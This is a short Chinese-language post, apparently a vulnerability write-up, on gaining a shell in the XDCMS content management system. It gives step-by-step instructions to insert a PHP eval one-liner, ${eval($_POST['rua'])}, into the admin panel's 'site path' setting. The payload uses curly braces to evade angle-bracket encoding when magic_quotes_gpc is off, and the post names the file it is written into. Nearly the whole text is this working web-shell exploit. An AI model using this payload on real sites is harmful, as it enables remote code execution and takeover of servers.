xdcms后台网站配置基本信息的网站路径处过滤不严,仍可以插一句话拿shell。 前提 magic_quotes_gpc=Off
1.进后台,在基本信息中的网站路径处添加一句话,因为尖括号被转码,但是可以添加花括号型的一句话,${eval($_POST['rua'])}。
2.一句话写入在/system/xdcms.inc.php中。 作者:J_R
评论 (0)